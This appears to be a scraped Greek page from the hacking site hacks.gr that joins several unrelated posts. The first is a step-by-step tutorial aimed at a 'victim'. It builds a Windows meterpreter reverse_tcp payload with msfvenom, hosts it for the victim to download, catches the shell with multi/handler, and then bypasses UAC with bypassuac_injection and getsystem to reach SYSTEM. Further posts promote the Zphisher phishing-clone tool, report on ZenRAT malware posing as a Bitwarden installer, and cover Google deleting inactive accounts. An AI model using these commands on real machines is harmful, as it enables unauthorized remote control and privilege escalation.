Το UAC (User Account Control) είναι o έλεγχος λογαριασμού χρήστη είναι ένα προειδοποιητικό μήνυμα που μας ενημερώνει και ζητάει την επιβεβαίωση μας κάθε φορά που θέλουμε να τρέξουμε ένα αρχείο που απαιτεί δικαιώματα διαχειριστή. Μια φωτογραφία..
Ωραία αφού μάθαμε τι είναι το UAC πάμε να ξεκινήσουμε.. αρχικά θα δείξω έναν πολύ απλό τρόπο για να πάρουμε meterpreter session (access) στο θύμα μας.
Ανοίξτε το terminal και > msfvenom -p windows/meterpreter/reverse_tcp LHOST=[TOPIKH IP MAS (IFCONFIG)] LPORT=[RANDOM PORT PX 4040] -f exe > ~/Desktop/root.exe
Αυτό για windows μηχανήματα.. μπορείτε να το ανεβάσετε στον apache για να το κατεβάσει το θύμα σας.
Ανοίγουμε το metasploit (service postgresql start + msfconsole) μπορείτε να το κάνετε και με το armitage που παρέχει γραφικό περιβάλλον.
Θα χρησιμοποιήσουμε το κλασικό multi/handler οπότε use exploit multi/handler και πατάμε enter.
Βάζουμε τα settings [show options] το payload το lhost + lport τα οποία τα βάλαμε στην δημιουργία το κακόβουλου αρχείου (με το msfvenom).
Και πατάμε exploit.. αφού τρέξει το θύμα μας το αρχείο βλέπουμε ότι έχουμε πρόσβαση μπορούμε να κάνουμε migrate σε κάποιο άλλο process.
Αν πατήσουμε getsystem θα μας έχει error.. οπότε πάμε. Πατάμε background.. το session μας .
Τώρα θα τρέξουμε το exploit use exploit/windows/local/bypassuac_injection για να κάνουμε bypass.. βάζουμε σαν setting το session [set SESSION 1] και πατάμε exploit.
Μας άνοιξε νέο session [sessions] και πατάμε getsystem και βλέπουμε.. got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
Ο Αλέξανδρος είναι ο ιδρυτής του hacks.gr και η κινητήρια δύναμη πίσω από το όραμά μας.
Με πολυετή εμπειρία στον κόσμο του hacking, έχει διαμορφώσει μια κοινότητα που είναι πηγή έμπνευσης και μάθησης για όλους.
Με τον προσωπικό του χαρακτήρα και την τεχνογνωσία του, έχει δημιουργήσει έναν χώρο όπου οι λάτρεις του hacking μπορούν να συναντιούνται, να μοιράζονται γνώσεις και να εξελίσσονται.
Zphisher: Ένα Εργαλείο για την Κυβερνοασφάλεια και την Ευαισθητοποίηση
Η κυβερνοασφάλεια είναι μια από τις σημαντικότερες προκλήσεις που αντιμετωπίζει ο ψηφιακός κόσμος μας σήμερα. Κάθε μέρα, διάφοροι κυβερνοεπιθέτες προσπαθούν να παραβιάσουν συστήματα, να κλέψουν προσωπικά δεδομένα, και να προκαλέσουν ζημιές. Για να καταπολεμήσουν αυτές τις απειλές, οι ειδικοί σε κυβερνοασφάλεια αναπτύσσουν διάφορα εργαλεία και τεχνικές για τη διατήρηση της ασφάλειας στον ψηφιακό κόσμο. Ένα από αυτά τα εργαλεία είναι το Zphisher.
Τι είναι το Zphisher;
Το Zphisher είναι ένα εργαλείο για τον κλώνο ιστοσελίδων με σκοπό την ανίχνευση ευπαθειών και την ευαισθητοποίηση των χρηστών όσον αφορά τις κυβερνοαπειλές. Πρόκειται για ένα εργαλείο που χρησιμοποιείται για εκπαιδευτικούς σκοπούς και εξαιρετικά σημαντικό για την ευαισθητοποίηση των ανθρώπων σχετικά με τις απειλές του phishing.
Κύρια χαρακτηριστικά του Zphisher:
Κλώνος Ιστοσελίδων: Το Zphisher επιτρέπει στους χρήστες να δημιουργήσουν πιστικές κλώνους ιστοσελίδων, όπως των κοινωνικών δικτύων, των τραπεζών και άλλων δημοφιλών ιστοσελίδων.
Ανίχνευση Ευπαθειών: Το εργαλείο επιτρέπει στους χρήστες να αναζητήσουν ευπάθειες στους κλώνους ιστοσελίδων τους, προκειμένου να διορθώσουν τυχόν αδυναμίες στην ασφάλεια των ιστοσελίδων.
Εκπαιδευτικός Σκοπός: Το Zphisher δημιουργήθηκε με εκπαιδευτικούς σκοπούς, προκειμένου να ευαισθητοποιήσει τους χρήστες σχετικά με τον κίνδυνο του phishing και τους βοηθήσει να προστατευτούν.
Σημείωση: Η χρήση του Zphisher για κακόβουλους σκοπούς είναι παράνομη και απαράδεκτη. Η ευαισθητοποίηση σχετικά με τις κυβερνοαπειλές πρέπει να γίνεται με ηθικό τρόπο και με σεβασμό προς τον νόμο.
Ο Αλέξανδρος είναι ο ιδρυτής του hacks.gr και η κινητήρια δύναμη πίσω από το όραμά μας. Με πολυετή εμπειρία στον κόσμο του hacking, έχει διαμορφώσει μια κοινότητα που είναι πηγή έμπνευσης και μάθησης για όλους. Με τον προσωπικό του χαρακτήρα και την τεχνογνωσία του, έχει δημιουργήσει έναν χώρο όπου οι λάτρεις του hacking μπορούν να συναντιούνται, να μοιράζονται γνώσεις και να εξελίσσονται.
Οι ερευνητές κυβερνοασφάλειας της εταιρείας ασφάλειας επιχειρήσεων Proofpoint ανακάλυψαν ένα τρομακτικό νέο κακόβουλο λογισμικό που διανέμεται ως πακέτο εγκατάστασης του δημοφιλούς διαχειριστή κωδικών πρόσβασης Bitwarden για να εξαπατήσει τους χρήστες και να κλέψει ευαίσθητα δεδομένα από τις συσκευές τους.
Αυτό το ψεύτικο πακέτο εγκατάστασης, με την ονομασία ZenRAT, παραδίδεται μέσω ενός ψεύτικου ιστότοπου Bitwarden, ο οποίος μοιάζει ακριβώς με τον αρχικό, αλλά δεν είναι νόμιμος. Αν ένας χρήστης δώσει προσοχή, είναι εύκολο να αντιληφθεί ότι οι χειριστές του κακόβουλου λογισμικού έχουν χρησιμοποιήσει την τεχνική typosquatting, επειδή ο ψεύτικος ιστότοπος έχει τίτλο bitwaridencom.
Οι κύριοι στόχοι του ZenRAT είναι ανυποψίαστοι χρήστες των Windows. Εάν ένας επισκέπτης κάνει κλικ στο σύνδεσμο λήψης που είναι σημειωμένος για άλλη πλατφόρμα (π.χ. Linux ή macOS), ανακατευθύνεται στον αρχικό ιστότοπο της Bitwarden (vault.bitwarden.com) στη σελίδα Λήψεις. Εάν ένας χρήστης των Windows κάνει κλικ σε αυτόν, η συσκευή του θα μολυνθεί με το ZenRAT και το κακόβουλο λογισμικό θα δημιουργήσει μια σύνδεση με τον διακομιστή C2 (185.186.7214).
Μόλις γίνει αυτό, το κακόβουλο λογισμικό θα συλλέξει τα επιθυμητά δεδομένα, συμπεριλαμβανομένων των λεπτομερειών του συστήματος και των αποθηκευμένων διαπιστευτηρίων. Το ZenRAT μπορεί να κλέψει πληροφορίες όπως τα ονόματα της CPU και της GPU, την έκδοση του λειτουργικού συστήματος, τη μνήμη RAM, τη διεύθυνση IP και την πύλη της συσκευής. Θα αποσπάσει επίσης πληροφορίες σχετικά με τις εγκατεστημένες λύσεις antivirus και άλλες εφαρμογές. Μπορεί επίσης να κλέψει δεδομένα και κωδικούς πρόσβασης του προγράμματος περιήγησης. Το ZenRAT διαβιβάζει τα αρχεία καταγραφής στον διακομιστή C2 σε απλό κείμενο.
Επαναπροσανατολίζει τους επισκέπτες του ιστότοπου σε έναν καλοήθη ιστότοπο. Ωστόσο, οι ερευνητές δεν διευκρίνισαν πώς ανακατευθύνονται οι επισκέπτες στον ιστότοπο. Προηγουμένως, το κακόβουλο λογισμικό διανεμόταν σε τέτοιες εκστρατείες μέσω phishing, SEO poisoning ή επιθέσεων malvertising. Το ωφέλιμο φορτίο φέρει τον τίτλο Bitwarden-installer-version-2023-7-1.exe και κατεβαίνει μέσω του crazygamescom. Αυτή η δούρειος ίππος έκδοση του νόμιμου εγκαταστάτη Bitwarden περιέχει ένα εκτελέσιμο αρχείο .NET με τίτλο (ApplicationRuntimeMonitor.exe).
Σύμφωνα με την ανάρτηση στο blog της Proofpoint, όταν οι ερευνητές εξέτασαν τα μεταδεδομένα του κακόβουλου πακέτου εγκατάστασης, παρατήρησαν ότι ο επιτιθέμενος το είχε μεταμφιέσει σε Speccy της Priform. Πρόκειται για ένα δωρεάν βοηθητικό πρόγραμμα των Windows που εμφανίζει πληροφορίες σχετικές με το υλικό/λογισμικό.
Επιπλέον, το εκτελέσιμο αρχείο έχει μια άκυρη υπογραφή που φαίνεται να υπογράφεται από τον διάσημο Γερμανό επιστήμονα πληροφορικής FileZilla Tim Kosse. Ωστόσο, αυτή η υπογραφή είναι επίσης ψεύτικη. Αυτό το σπονδυλωτό RAT εκτελεί επίσης ελέγχους anti-sandbox και anti-VM για να διαπιστώσει αν είναι ασφαλές να λειτουργεί στη συσκευή. Οι έλεγχοι περιλαμβάνουν επίσης geofencing για να διασφαλιστεί ότι δεν έχει εγκατασταθεί σε καμία ρωσόφωνη περιοχή.
Προσοχή κατά τη χρήση ενός διαχειριστή κωδικών πρόσβασης
Οι ερευνητές συμβουλεύουν τους χρήστες να είναι προσεκτικοί κατά τη λήψη λογισμικού και συνιστούν να προμηθεύονται εφαρμογές αποκλειστικά από επίσημες πηγές. Αξίζει να σημειωθεί ότι οι διαχειριστές κωδικών πρόσβασης έχουν γίνει συχνά στόχος κυβερνοεπιθέσεων και απάτης, με το LastPass να αποτελεί ένα αξιοσημείωτο παράδειγμα.
Ως ασφαλέστερη εναλλακτική λύση, τα τρία κορυφαία προγράμματα περιήγησης – Google Chrome, Mozilla Firefox και Safari – προσφέρουν δωρεάν λειτουργίες διαχείρισης κωδικών πρόσβασης. Αν δεν είστε σίγουροι για το ποια υπηρεσία να χρησιμοποιήσετε, οποιαδήποτε από αυτές τις τρεις επιλογές θα σας προσφέρει παρόμοια οφέλη και, σε ορισμένες περιπτώσεις, μπορεί να είναι πιο ασφαλής από άλλες.
Η Google Ξεκινά τη Διαγραφή Ανενεργών Λογαριασμών: Πώς να Διατηρήσετε τον Δικό Σας Ασφαλή
Η Google ανακοίνωσε σήμερα ένα νέο βήμα στην πολιτική της για τη διαγραφή παλιών και ανενεργών λογαριασμών. Αν διαθέτετε έναν λογαριασμό Google που δεν έχετε χρησιμοποιήσει εδώ και μερικά χρόνια, είναι πιθανό να χρειαστεί να λάβετε μέτρα για να τον διατηρήσετε ενεργό.
Η Google ξεκινά αυτήν τη διαδικασία για λόγους ασφαλείας, καθώς οι ανενεργοί λογαριασμοί είναι πιο ευάλωτοι σε πιθανές παραβιάσεις. Αρχίζοντας με λογαριασμούς που δημιουργήθηκαν και δεν έχουν χρησιμοποιηθεί ποτέ, η Google επιδιώκει να διατηρήσει την ασφάλεια του οικοσυστήματός της.
Για να αποφύγετε τη διαγραφή του λογαριασμού σας, μπορείτε να συνδεθείτε ξανά σε αυτόν ή να αποστείλετε ένα email. Επίσης, η εγγραφή σε υπηρεσίες της Google, όπως το Google Drive, ή η παρακολούθηση περιεχομένου στο YouTube μπορεί να συνεισφέρει στη διατήρηση του λογαριασμού σας ως ενεργού.
Εάν χρησιμοποιείτε το Google Photos, θα πρέπει να συνδεθείτε σε αυτόν κάθε δύο χρόνια για να θεωρηθεί ενεργός και να διατηρήσει τις φωτογραφίες και το περιεχόμενο που έχετε αποθηκεύσει.
Είναι σημαντικό να σημειώσετε ότι οι λογαριασμοί Google που έχουν δημιουργηθεί για εργασία ή σχολείο, καθώς και οι λογαριασμοί που έχουν αγοράσει υπηρεσίες ή συνδρομές, δεν επηρεάζονται από αυτήν την πολιτική διαγραφής.
Προτού αποφασίσετε να αφήσετε ανενεργό έναν λογαριασμό, εξετάστε τις παραπάνω πληροφορίες και λάβετε τα απαραίτητα μέτρα για τη διατήρηση της ασφάλειας και της προστασίας των προσωπικών σας δεδομένων.
Ο Αλέξανδρος είναι ο ιδρυτής του hacks.gr και η κινητήρια δύναμη πίσω από το όραμά μας.
Με πολυετή εμπειρία στον κόσμο του hacking, έχει διαμορφώσει μια κοινότητα που είναι πηγή έμπνευσης και μάθησης για όλους.
Με τον προσωπικό του χαρακτήρα και την τεχνογνωσία του, έχει δημιουργήσει έναν χώρο όπου οι λάτρεις του hacking μπορούν να συναντιούνται, να μοιράζονται γνώσεις και να εξελίσσονται.